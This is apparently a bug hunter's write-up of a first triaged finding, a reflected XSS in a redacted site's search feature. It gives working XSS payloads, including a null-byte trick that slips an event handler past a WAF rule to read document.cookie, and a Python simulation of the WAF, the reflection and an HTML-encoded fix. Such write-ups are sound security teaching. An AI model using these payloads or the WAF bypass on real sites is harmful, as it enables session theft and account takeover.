Introduction
Every bug hunter remembers their first triaged report, and this is mine.
After months of learning web security, testing applications, and submitting reports that didn't always go anywhere, I finally got my first vulnerability triaged. It wasn't about the bounty; it was about validation and progress.
In this post, I'll walk through how I discovered a Reflected Cross-Site Scripting (XSS) vulnerability in a web application (target redacted), how I confirmed impact, and what I learned from the process.
Discovery
While exploring the application, I noticed a search feature used to look up articles.
Search endpoints are always interesting, so I began testing how user input was handled. Basic reflection checks showed that my input was being returned in the response, a classic sign that XSS might be possible.
That's when I decided to try a more advanced payload.
Exploitation
When I tried to inject a simple payload like <img src=x onerror=confirm(1)>, it didn't work: the firewall detected it as a malicious action and returned a 403 response. I tried many injections, but nothing worked. Then I started analyzing, and after a while I noticed that if you type any JavaScript event handler followed by the assignment sign, for example "onerror=", the firewall detects it and you get blocked. So an idea hit me: why not try null byte injection here? I crafted this payload:
</strong></p></section>"<img src =x one%00rror=conf%00irm(document.cookie)">"
The closing </strong></p></section> tags broke out of the HTML context the search term was reflected into, and the image tag that followed carried an event handler obfuscated with null bytes so the firewall's "on...=" check never matched it.
Because this was reflected, the attack would require social engineering (sending a crafted link to a victim), but the impact was still serious.
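The following is an added example, not code from the write-up or from the target application. It models the three moving parts of the bypass above so you can see why the null byte works and, just as importantly, when it would not: a constructed WAF rule that blocks anything shaped like an event-handler assignment, a backend that reflects the search term into an assumed <section><p><strong> layout (matching the closing tags in the payload), and an approximation of what a browser's HTML tokenizer does with a NUL inside an attribute name (it becomes U+FFFD, so a raw "one<NUL>rror" is never treated as onerror). The assumption doing the real work is that the backend dropped the NUL bytes before reflecting the term; the write-up does not say what its target did, but without that step the reflected handler would not fire. The payload is a simplified form of the one above with the stray quotes removed.

```python
import html
import re
import urllib.parse

# Constructed stand-in for the WAF rule the write-up ran into: block any
# request whose search term looks like an event-handler assignment (on...=).
EVENT_HANDLER_RULE = re.compile(r"on\w+\s*=", re.IGNORECASE)

# Constructed payloads. PAYLOAD is a simplified form of the write-up's
# null-byte payload (stray quotes dropped, spacing tidied).
NAIVE_PAYLOAD = "<img src=x onerror=confirm(1)>"
PAYLOAD = "</strong></p></section><img src=x one%00rror=conf%00irm(document.cookie)>"


def waf_blocks(decoded_query: str) -> bool:
    """True when the URL-decoded search term trips the blocklist rule.
    A NUL byte splits the handler name, so "one<NUL>rror=" never matches on\\w+=."""
    return EVENT_HANDLER_RULE.search(decoded_query) is not None


def render(term: str) -> str:
    """Search-results fragment the term is reflected into (assumed layout,
    chosen to match the closing tags in the payload)."""
    return "<section><p><strong>Results for: " + term + "</strong></p></section>"


def raw_reflect_page(query: str) -> str:
    """Backend that reflects the decoded term byte-for-byte, NULs included."""
    return render(query)


def vulnerable_page(query: str) -> str:
    """ASSUMED backend behaviour: NUL bytes are dropped before reflection.
    This is what turns a null-byte-split handler into a live 'onerror='
    in the served HTML."""
    return render(query.replace("\x00", ""))


def hardened_page(query: str) -> str:
    """Same backend with contextual output encoding: the term can no longer
    close the enclosing tags or open a new one, whatever the WAF lets through."""
    return render(html.escape(query.replace("\x00", ""), quote=True))


def simulate(encoded_query: str, page_fn) -> dict:
    """Run one request through the WAF and then the backend."""
    decoded = urllib.parse.unquote(encoded_query)
    if waf_blocks(decoded):
        return {"status": 403, "body": ""}
    return {"status": 200, "body": page_fn(decoded)}


def browser_sees_onerror(body: str) -> bool:
    """Approximate the browser's HTML tokenizer: a NUL inside a tag or
    attribute name becomes U+FFFD, so "one<NUL>rror" is never onerror.
    Only a body whose NULs are already gone carries a live handler."""
    parsed = body.replace("\x00", "\ufffd")
    return re.search(r"<img[^>]*\sonerror\s*=", parsed, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, page in [("raw reflect", raw_reflect_page),
                       ("strips NULs", vulnerable_page),
                       ("HTML-encodes", hardened_page)]:
        naive = simulate(NAIVE_PAYLOAD, page)
        nul = simulate(PAYLOAD, page)
        print(f"{name:13} naive payload -> {naive['status']}; "
              f"null-byte payload -> {nul['status']}, "
              f"handler live: {browser_sees_onerror(nul['body'])}")
```

The practical check this suggests: after a null-byte bypass gets past the WAF, look at the raw response in your proxy and confirm the NULs are actually gone from the reflected string. If they are still there, the handler will not fire in the browser even though the request returned 200. On the defensive side, the hardened variant is the real fix; a regex blocklist in front of unencoded reflection is exactly the kind of control a split token walks past.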
Impact
Successful exploitation allows an attacker to:
- Steal session cookies (those not marked HttpOnly)
- Perform actions as the victim
- Redirect users to malicious pages
- Potentially lead to account takeover
- Run arbitrary JavaScript in users' browsers
Any authenticated user who clicked a malicious link could be compromised.
Thank you all for reading and for your time ❤ I hope you had some fun with me and liked this write-up, inshallah ❤
As soon as I get something interesting to write about, I'm going to share it :D
Have fun and keep digging ❤